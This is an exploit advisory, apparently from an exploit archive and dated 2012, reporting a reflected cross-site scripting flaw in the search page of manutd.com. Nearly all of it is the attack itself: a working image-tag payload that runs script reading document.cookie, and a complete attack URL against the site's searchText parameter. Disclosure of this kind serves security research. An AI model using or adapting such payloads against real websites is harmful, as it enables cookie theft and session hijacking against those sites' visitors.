www.manutd.com suffers from a cross site scripting vulnerability.
b93e7db422e3d4e0a24dc9704910e5058851a6c5c6f50e64a456dc615b7614cf
# Exploit Title: manchester united xss
# Date: 10.08.2012
# Author: TayfunBasoglu
# Tested: BackTrack 5
# Platform: Php
----------------
http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=XSS
<img src=x onerror=prompt(document.cookie);>
http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText="><img src=x onerror=prompt(document.cookie);>